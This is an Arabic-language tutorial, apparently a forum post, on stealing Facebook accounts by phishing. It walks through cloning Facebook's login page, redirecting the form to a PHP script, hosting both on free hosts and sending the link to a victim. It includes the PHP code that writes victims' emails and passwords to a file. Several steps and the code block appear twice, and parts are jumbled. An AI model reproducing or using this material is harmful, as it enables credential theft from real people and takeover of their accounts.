تقنية ال"Phishing" الشهيرة في اختراق حساب الفيسبوك --"Arabic Facebook Phishing"
في هذا الموضوع سوف أقوم بشرح هذه التقنية وذلك باظهار كيفية صنع الصفحة الرئيسية الوهمية أو الإفتراضية
: لأي موقع لا بد لك من توفر ثلاث ملفات مشتركة "Phishing" لصنع صفحة
: وهي
(الصفحة الوهمية) HTML ملف
(لتتبع التفاصيل داخل الصفحة التي أنشأتها) PHP ملف
(لحفظ جميع المعلومات في شكل نص) Txt ملف
Phishingنموذج عملي لإختراق حساب فيس بوك باستعمال تقنية ال
كيف تنشأ صفحة فيسبوك وهمية ؟
:ثم اضغط في أي مكان بزر الماوس الأيمن ومن القائمة التي تظهر اضغط على
"view page source"
"view page source"
( CTRL + A ) ثانيا. من لوحة المفاتيح اضغط على المفتاحين
notepadلإختيار جميع الصفحة ثم قم بعمليتي نسخ ولصق لجميع أكواد هذه الصفحة على ال
notepadلإختيار جميع الصفحة ثم قم بعمليتي نسخ ولصق لجميع أكواد هذه الصفحة على ال
وسوف تعثر على "action" للبحث عن الكلمة (CTRL + F) ثالثا. اضغط على المفتاحين
:الكود التالي
action="https://www.facebook.com/login.php?login_attempt=1"
: رابعا. استبدل الكود المبين أعلاه بالكود التالي
action="speeed04.php"
(anyname.php) أو speeed04.php بعدما استبدلته إلى
facebook.html لحفظ هذا الملف بامتداد (CTRL + S) اضغط على المفناح
(anyname.html) أو
!!وبانتهائنا من هذه الخطوات تكون صفحتنا الوهمية جاهزة
PHP خامسا. الآن نأتي إلى انشاء الملف الثاني وهو ملف
notepadالتالي ثم الصقه على محرر ال PHPوببساطة لإنشاء هذا الملف قم بنسخ كود ال
(speeed04.php احفظه بالإمتداد الذي اخترته سابقا (في مثالنا السابق اخترنا الإمتداد notepadبعد لصقه على ال
هو الرابط الذي يقوم بتوجيه الضحية بمجرّد ادخال معلومتي تسجيل الدخول
"connection" الإيميل والباسوورد) ثم الضغط على)
PHP وبتمام هذه الخطوة نكون قد اتممنا انشاء ملف
سادسا. الآن سجّل في احدى المواقع ذات الإستضافات المجانية
: مثلا
my3gb.com
t35.com
110mb.com
أو
ripway
أو
drivehq
.
.
الخ
سابعا. بعد تسجيلك في إحدى هذه المواقع المجانية قم باضافة الملفين التاليين إلى
:الموقع
facebook.html
speeed04.php
(directory) تأكد من أن هذان الملفان في نفس المجلّد
ثامنا. بعد استضافة هاذان الملفان في الموقع المجاني سوف تحصل على رابط مباشر للصفحة الوهمية التي أنشأتها سابقا
(facebook.html صفحة)
تاسعا. استخدم هذا اللينك أو الرابط لإرساله إلى الضحية. وبمجرّد ما يدخل الإيميل والباسوورد الخاصة بحسابه
سوف تظهر صفحة جديدة"connection" على الصفحة الوهمية ويضغط على
تحتوي على كلا من (password.html) آليا على نفس المجلّد تحمل اسم الصفحة
.اسم المستخدم وباسوورد الضحية
:الكود التالي
action="https://www.facebook.com/login.php?login_attempt=1"
: رابعا. استبدل الكود المبين أعلاه بالكود التالي
action="speeed04.php"
(anyname.php) أو speeed04.php بعدما استبدلته إلى
facebook.html لحفظ هذا الملف بامتداد (CTRL + S) اضغط على المفناح
(anyname.html) أو
!!وبانتهائنا من هذه الخطوات تكون صفحتنا الوهمية جاهزة
PHP خامسا. الآن نأتي إلى انشاء الملف الثاني وهو ملف
notepadالتالي ثم الصقه على محرر ال PHPوببساطة لإنشاء هذا الملف قم بنسخ كود ال
(speeed04.php احفظه بالإمتداد الذي اخترته سابقا (في مثالنا السابق اخترنا الإمتداد notepadبعد لصقه على ال
<?php
$fp = fopen("Passwords.htm", "a");
fwrite($fp, "Email:$_POST[email]\tPassword:$_POST[pass]");
echo "<HTML>
<head>
<FRAMESET cols=\"*\">
<FRAME SRC=\"http://www.facebook.com\">
</FRAMESET>";
?>
$fp = fopen("Passwords.htm", "a");
fwrite($fp, "Email:$_POST[email]\tPassword:$_POST[pass]");
echo "<HTML>
<head>
<FRAMESET cols=\"*\">
<FRAME SRC=\"http://www.facebook.com\">
</FRAMESET>";
?>
!!ما يجب أن تعلمه
"connection" الإيميل والباسوورد) ثم الضغط على)
PHP وبتمام هذه الخطوة نكون قد اتممنا انشاء ملف
سادسا. الآن سجّل في احدى المواقع ذات الإستضافات المجانية
: مثلا
my3gb.com
t35.com
110mb.com
أو
ripway
أو
drivehq
.
.
الخ
سابعا. بعد تسجيلك في إحدى هذه المواقع المجانية قم باضافة الملفين التاليين إلى
:الموقع
facebook.html
speeed04.php
(directory) تأكد من أن هذان الملفان في نفس المجلّد
ثامنا. بعد استضافة هاذان الملفان في الموقع المجاني سوف تحصل على رابط مباشر للصفحة الوهمية التي أنشأتها سابقا
(facebook.html صفحة)
تاسعا. استخدم هذا اللينك أو الرابط لإرساله إلى الضحية. وبمجرّد ما يدخل الإيميل والباسوورد الخاصة بحسابه
سوف تظهر صفحة جديدة"connection" على الصفحة الوهمية ويضغط على
تحتوي على كلا من (password.html) آليا على نفس المجلّد تحمل اسم الصفحة
.اسم المستخدم وباسوورد الضحية